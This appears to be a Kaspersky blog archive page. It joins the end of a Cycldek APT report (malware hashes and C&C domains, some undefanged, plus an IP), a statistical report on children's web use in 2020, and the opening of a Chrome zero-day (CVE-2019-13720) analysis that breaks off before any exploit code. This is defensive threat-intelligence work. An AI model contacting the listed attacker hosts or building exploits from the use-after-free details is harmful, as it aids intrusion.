Another explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.

Conclusion

Cycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.

Furthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it’s worth noting that we noted multiple points where such entities didn’t work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.

Lastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased – it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.

For more information about Cycldek operations, contact us at: intelreports@kaspersky.com

Appendix – IOCs

Note: a full list of IOCs can be found in our reports on the subject in Kaspersky’s Threat Intelligence Portal.

RedCore:

A6C751D945CFE84C918E88DF04D85798 – wsc.dll (side-loaded DLL)
4B785345161D288D1652C1B2D5CEADA1 – msgsm64.acm (encrypted shellcode and implant)

BlueCore:

1B19175C41B9A9881B23B4382CC5935F  – QcLite.dll (side-loaded DLL)
6D2E6A61EEDE06FA9D633CE151208831 – QcLite.dll (side-loaded DLL)
6EA33305B5F0F703F569B9EBD6035BFD – QcLite.dll (side-loaded DLL)
600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)

Lateral Movement and Info-Stealing Toolset:

1640EE7A414DFF996AF8265E0947DE36 Chromepass
1EA07468EBDFD3D9EEC59AC57A490701 Chromepass
07EE1B99660C8CD5207E128F44AA8CBC JsonCookies
809196A64CA4A32860D28760267A1A8B Custom HDoor
81660985276CF9B6D979753B6E581D34 Custom HDoor
A44804C2767DCCD4902AAE30C36E62C0 Custom HDoor

 

USBCulprit:

A9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader
C73B000313DCD2289F51B367F744DCD8 USBCulprit Loader
2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader
4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader
6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader
7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader
782FF651F34C87448E4503B5444B6164 USBCulprit Loader
88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader
A4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader
3CA7BD71B30007FC30717290BB437152 USBCulprit Payload
58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload
A02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload
D8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload
2E522CE8104C0693288C997604AE0096 USBCulrprit Payload

 

Toolset overlapping in both clusters:

Common Name MD5 Blue Cluster Domain Red Cluster Domain Description chromepass.exe 1EA07468EBDFD3D9EEC59AC57A490701 http://login.vietnamfar.com:8080

  http://news.trungtamwtoa.com:88 ChromePass goopdate.dll D8DB9D6585D558BA2D28C33C6FC61874 http://cophieu.dcsvnqvmn.com:8080 http://mychau.dongnain.com:443

http://hcm.vietbaonam.com:443 USBCulprit 2E522CE8104C0693288C997604AE0096 http://nghiencuu.onetotechnologys.com:8080

ttp://tinmoi.thoitietdulich.com:443

http://tinmoi.thoitietdulich.com:53 http://tinmoi.vieclamthemde.com:53

http://tinmoi.vieclamthemde.com USBCulprit qclite.dll 7FF0AF890B00DEACBF42B025DDEE8402 http://web.hcmuafgh.com http://tinmoi.vieclamthemde.com

http://tintuc.daikynguyen21.com BlueCore Loading Hijacked DLL silverlightmsi.dat A44804C2767DCCD4902AAE30C36E62C0 http://web.laovoanew.com:443

http://cdn.laokpl.com:8080 http://login.dangquanwatch.com:53

http://info.coreders.com:8080 Custom HDoor

 

C&Cs and Dropzones:

http://web.laovoanew[.]com – Red Cluster

http://tinmoi.vieclamthemde[.]com – Red Cluster

http://kinhte.chototem[.]com – Red Cluster

http://news.trungtamwtoa[.]com – Red Cluster

http://mychau.dongnain[.]com – Red Cluster

http://hcm.vietbaonam[.]com – Red Cluster

http://login.thanhnienthegioi[.]com – Red Cluster

http://103.253.25.73 – Red Cluster

http://luan.conglyan[.]com – Red Cluster

http://toiyeuvn.dongaruou[.]com – Red Cluster

http://tintuc.daikynguyen21[.]com – Red Cluster

http://web.laomoodwin[.]com – Red Cluster

http://login.giaoxuchuson[.]com – Red Cluster

http://lat.conglyan[.]com – Red Cluster

http://thegioi.kinhtevanhoa[.]com – Red Cluster

http://laovoanew[.]com – Red Cluster

http://cdn.laokpl[.]com – Red Cluster

http://login.dangquanwatch[.]com – Blue Cluster

http://info.coreders[.]com – Blue Cluster

http://thanhnien.vietnannnet[.]com – Blue Cluster

http://login.diendanlichsu[.]com – Blue Cluster

http://login.vietnamfar[.]com – Blue Cluster

http://cophieu.dcsvnqvmn[.]com – Blue Cluster

http://nghiencuu.onetotechnologys[.]com – Blue Cluster

http://tinmoi.thoitietdulich[.]com – Blue Cluster

http://khinhte.chinhsech[.]com – Blue Cluster

http://images.webprogobest[.]com – Blue Cluster

http://web.hcmuafgh[.]com – Blue Cluster

http://news.cooodkord[.]com – Blue Cluster

http://24h.tinthethaoi[.]com – Blue Cluster

http://quocphong.ministop14[.]com – Blue Cluster

http://nhantai.xmeyeugh[.]com – Blue Cluster

http://thoitiet.yrindovn[.]com – Blue Cluster

http://hanghoa.trenduang[.]com – Blue Cluster

2020. június 3.

Kids on the Web in 2020

Technology is what is saving us from a complete change in the way of life in a world of a raging pandemic. It keeps the educational process going, relieves the shortage of human communication and helps us to live life as fully as possible given the isolation and social distancing. Many adults, and children too, have come to realize that the computer is not just a means of entertainment, but an important tool for education, communication and personal growth.

In this article, we look at changes that occurred in children’s behavior on the Web over the past year and the pandemic period. The report is based on statistics gathered by Kaspersky Safe Kids, a software solution that protects children from unwanted content on the Internet.

How we collect our statistics

Kaspersky Safe Kids scans the contents of a Web page the child is trying to access. If the site falls into one of fourteen undesirable categories, the module sends an alert to Kaspersky Security Network. No user’s personal information is transmitted and neither is privacy compromised.

We will note two important points:

  • It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. But anonymous statistics are collected for all the 14 categories.
  • Data is harvested only from computers running Windows and macOS; no mobile statistics are provided in this report.
Website categorization

Kaspersky Safe Kids filters Web content according to the following categories:

In this article, we will take a closer look at the most-visited categories for the past year. We have combined the less popular ones into a separate category, with their share of alerts marked as “Other”.

Picture of the world

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020 (download)

Children around the world have spent increasingly more time watching videos and listening to music. Software, Audio, Video accounted for nearly forty percent of all Safe Kids alerts over the past year. It was followed by Internet Communications with 24.16 percent and Video Games with 15.98 percent. Online stores were fourth in popularity with 11 percent and News were fifth with 5.54 percent.

Interestingly, Job Search sites with 0.89 percent attracted far more interest from teenagers than Adult Content with 0.74 percent.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids Windows and macOS alerts distribution by category in June 2019 through May 2020 (download)

Windows users spent more time watching videos, gaming and reading news than macOS users. The latter preferred chatting and spent much more time shopping online. That said, the adult content Windows users watched on the average more frequently during the year.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution by category in June 2019 through May 2020 (download)

The pandemic forced kids to study at home, attending classes online, and we have seen how this affected their time at the computer. They less frequently visited gaming sites starting at the beginning of the year, even when compared with the September 2019 low of 16.75 percent: the figure fell to 13.26 percent in May. Meanwhile, Internet Communications showed a slight growth in April exceeding the October 2019 high by 0.85 p.p. to reach 27.51 percent.

Children visited online stores the most in the October of 2019. The category accounted for 16.93 percent of all alerts. The popularity of online shopping has steadily decreased since then, dropping by 7.57 p.p. to 9.3 percent by April, but May saw it rebound slightly. Adult Content grew somewhat (by about 0.5 p.p.) in winter, then returned to the summer 2019 levels (0.49 percent) in May.

The graph shows an abnormal drop in visits to Software, Audio, Video websites  in October. The most likely cause can be considered to be the new macOS version, Catalina, released on October 7. Users who installed the update faced issues with streaming video on YouTube, Netflix, Amazon Prime and many other sites. The issue affected not just the Safari browser, but Google Chrome, Opera and Firefox as well. It was fixed in November, a fact that the statistics reflect.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on macOS in June 2019 through May 2020 (download)

Differences across regions, countries and months

Let us take a closer look at the most popular categories by region and by country to see if children’s preferences changed during the pandemic.

Software, audio, video

Software, Audio, Video has remained ahead of Internet Communications in recent years: kids have used Windows and macOS computers for watching videos and listening to music, but switched to mobile devices to chat. The category has retained its popularity even through the lockdown and online studies.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020 (download)

According to KSN statistics for the first half of 2020, Software, Audio, Video began to grow worldwide, reaching a peak of 42.47 percent on all platforms by May.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS in June 2019 through May 2020 (download)

We explained the decrease in the category’s share on macOS in the fall and winter with issues stemming from an operating system update. As for the decline among Windows users around the same time, it was offset by increasing interest in other categories of sites, for instance, E-Commerce.

By the end of the reporting period, the share of Software, Audio, Video had increased among Windows users, whereas children using macOS began watching videos less frequently by May.

Kids in South Asia (India, Bangladesh) were most likely to spend their time watching videos and listening to music (46.16 percent). It was followed by Africa with 44.75 percent and the CIS with 43.83 percent.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by region in June 2019 through May 2020 (download)

The category had the lowest share in North America (36.20 percent) and Europe (35.94 percent). As we will see below, children in these regions gave preference not only to watching videos, but video games as well.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Software, Audio, Video on Windows and macOS by region in June 2019 through May 2020 (download)

In Asia and South Asia, children who used macOS were more likely to consume audio and video content than those who used Windows. In other regions, the category’s Windows share was higher than macOS. In the CIS countries, children’s behavior was nearly identical on the two operating systems.

Interestingly, the distribution of countries where the share of Software, Audio, Video was the largest differs slightly from the regional breakdown.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Software, Audio, Video by country in June 2019 through May 2020 (download)

Children in Belarus (50.59 percent), Japan (49.67 percent), Saudi Arabia (49.54 percent) and India (47.66 percent) favored websites that offered video and music over the past year. YouTube was the most popular video streaming service with kids anywhere in the world.

Online communication

Internet Communications predictably peaked at 27.45 percent in April 2020 as the process of switching schoolchildren to distance learning completed in most countries.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020 (download)

We observe a pronounced growth from 17.87 percent in June 2019 to 36.63 percent in May 2020 on desktop computers and laptops running macOS. October’s peak was due to a reduction in the share of Software, Audio, Video category following the macOS update.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Internet Communications on Windows and macOS in June 2019 through May 2020 (download)

Internet Communications accounted for an average of 32.76 percent, with 32.17 percent in Latin America and 30.54 percent in the CIS, and the lowest recorded shares being 15.50 percent in Europe and 16.58 percent in Oceania.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Internet Communications by region in June 2019 through May 2020 (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Internet Communications by country on the average in June 2019 through May 2020 (download)

The largest proportions of children using personal computers for internet communication were recorded in Egypt, Kenya, Mexico and Russia. The lowest rates were recorded in Germany, Australia, the UK and Canada.

Starting at the beginning of 2020, the most popular sites in the Internet Communications category were skype.com, hangouts.google.com, web.whatsapp.com, meet.google.com, facebook.com, twitter.com and mail.google.com.

Computer games

Despite the fact that the share of Video Games alerts showed a downward trend in the first half of 2020, the category ranked third among the most popular website topics.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020 (download)

Kids spent more times playing video games on Windows than macOS desktop computers and laptops. This is due to the fact that most computer games are released for the Windows operating system. However, by the end of the reporting period, macOS users’ interest in games had grown.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Video Games on Windows and macOS in June 2019 through May 2020 (download)

Kids all around the world started visiting gaming sites less frequently, though. This can be explained by added activity in the form of school lessons, which relocated into the home due to the pandemic. Interestingly, the share of Video Games began to decline among Windows users starting in the fall of 2019.

While North America, Europe and Oceania did not show increased activity in Internet Communications and Software, Audio, Video, these regions had the highest shares of Video Games activity.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Video Games by region in June 2019 through May 2020 (download)

According to our statistics, the UK had the highest proportion of children interested in games with 23.94 percent, followed by the US with 21.61 percent and Australia with 20.94 percent. The most popular Video Games sites in the UK and the US were blizzard.com, roblox.com, epicgames.com, discordapp.com, ubi.com, origin.com, friv.com, curseforge.com, minecraftmods.com and crazygames.com. Australia’s most popular sites in the category were roblox.com and a variety of Minecraft message boards.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Video Games by country in June 2019 through May 2020 (download)

E-Commerce

E-Commerce is another category where we observed increased activity throughout the year.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for E-Commerce in June 2019 through May 2020 (download)

The October 2019 peak, as we said earlier, was associated with a disruption in percentage shares across categories on all platforms due to a malfunction in the new macOS. But, in November and December, kids’ interest in online shopping was also higher than in the other months. Which is not surprising: November is the time of the Black Friday sales around the world, and December typically sees everyone busy picking Christmas and New Year’s presents.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for E-Commerce on Windows and macOS in June 2019 through May 2020 (download)

Children who used macOS spent much more hours looking at online shopping windows than their peers who used Windows.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for E-Commerce by region in June 2019 through May 2020 (download)

Children in Europe, North America and Oceania visited online stores and showed interest in shopping more frequently than others. The CIS, Asia and Latin America showed the lowest activity rates in the world.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for E-Commerce by country in June 2019 through May 2020 (download)

The leaders by share of visits to online stores were children in Germany (19.51 percent), the UAE (17.22 percent) and Canada (15.86 percent). The lowest figure was recorded in Kazakhstan (4.60 percent) and Egypt (5.18 percent).

The most visited sites in Germany were amazon.de, otto.de, ebay.com; in the UAE, amazon.ae, panemirates.com, amazon.com and luluhypermarket.com; and in Canada, amazon.ca, visions.ca and bestbuy.ca.

News

Not just adults, but kids, too, showed interest in news, especially in light of recent events. The number of children’s visits to news websites grew around the world as coverage of the pandemic began. The peak (7.26 percent) fell on March, when most children were switched to distance learning.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020 (download)

Windows users, in general, showed more interest in news than those who used macOS. However, in February, the figure for macOS (7.25 percent) was higher than that for Windows (6.75 percent).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for News on Windows and macOS in June 2019 through May 2020 (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for News by region in June 2019 through May 2020 (download)

The largest share of News among Safe Kids users was recorded in Europe (11.11 percent), where the most active news-reading countries were the UK (14.14 percent), Germany (12.75 percent), France (10.97 percent) and Italy (10.25 percent). The lowest rate was recorded in the CIS (3.17 percent) and Africa (3.96 percent).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for News by country in June 2019 through May 2020 (download)

Interest in news peaked in the UK and in Italy at in February. Think of the fact that the transition to distance learning in these two countries took place in late February, whereas Germany and France went through the transition in early March, and interest in news there peaked in March, too.

Adult content

Kids were interested in adult content to a lesser extent. According to the global statistics, the popularity of this category peaked in January 2020 (1.12 percent), followed by a decline to the annual average.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020 (download)

That said, macOS users showed greater interest in pornography than Windows users.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Adult Content on Windows and macOS in June 2019 through May 2020 (download)

Though in 2019 Windows accounted for a higher percentage of alerts, the trend changed at the beginning of 2020.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Adult Content by region in June 2019 through May 2020 (download)

The CIS and Europe had the largest share of users who showed interest in Adult Content: 1.07 percent and 0.83 percent, respectively. The lowest rates were recorded in the Arab world (0.18 percent) and Oceania (0.24 percent).

However, the distribution by country shows that children in Mexico had the highest interest in Adult Content: 1.72 percent.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Kaspersky Safe Kids alerts distribution for Adult Content by country in June 2019 through May 2020 (download)

They were followed by children in Russia (1.06 percent) and France (0.95 percent). Children in China were least likely to access Adult Content on desktop computers: 0.04 percent.

Summary

The world is witnessing an unprecedented demonstration of digital technology primarily helping children develop, rather than impede their development. Online education, and communication with friends and relatives are all made possible only through technology developed in recent decades, which have become not just a day-to-day assistant, but a lifeline in times when leaving home and making personal contact can pose a health threat.

Data for recent months shows that children who are staying at home with constant access to the computer primarily chat and watch videos. And those are not necessarily just entertaining videos: there might be educational content amid that stream of YouTube clips.

This year, we noticed an interesting trend: children who use different operating systems diverge in their online behaviors. Kids who use macOS spend more time in online stores, show slightly more interest in adult content, chat more online and less frequently visit gaming sites. Windows users show greater interest in games and news, and visit websites with video and audio content more frequently.

We have also learned that children, like adults, pay attention to the news when the situation in the world concerns them directly. So, in the month when various countries were expecting to switch to distance learning, kids started to follow the situation closer by going to news sites.

Today’s children, who start interacting with technology at an early age, find moving all of their day-to-day activities online much easier than adults, and they are better adapted to situations where going outside could be life-threatening. Adults tend to question certain online activity, such as communications, but in a world where it is the only safe means of social contact, comes the realization that there may be more to it!

2020. május 28.

The zero-day exploits of Operation WizardOpium

Back in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we’ve already published blog posts briefly describing this operation (available here and here), in this blog post we’d like to take a deep technical dive into the exploits and vulnerabilities used in this attack.

Google Chrome remote code execution exploit

In the original blog post we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following commit. A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:

if (!buffer) { + BaseAudioContext::GraphAutoLocker context_locker(Context()); + MutexLocker locker(process_lock_); reverb_.reset(); shared_buffer_ = nullptr; return;

As you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.

class MODULES_EXPORT ConvolverHandler final : public AudioHandler { ... std::unique_ptr<Reverb> reverb_; std::unique_ptr<SharedAudioBuffer> shared_buffer_; ...

These objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.

The exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the PartitionAlloc memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from partition_alloc_constants.h:

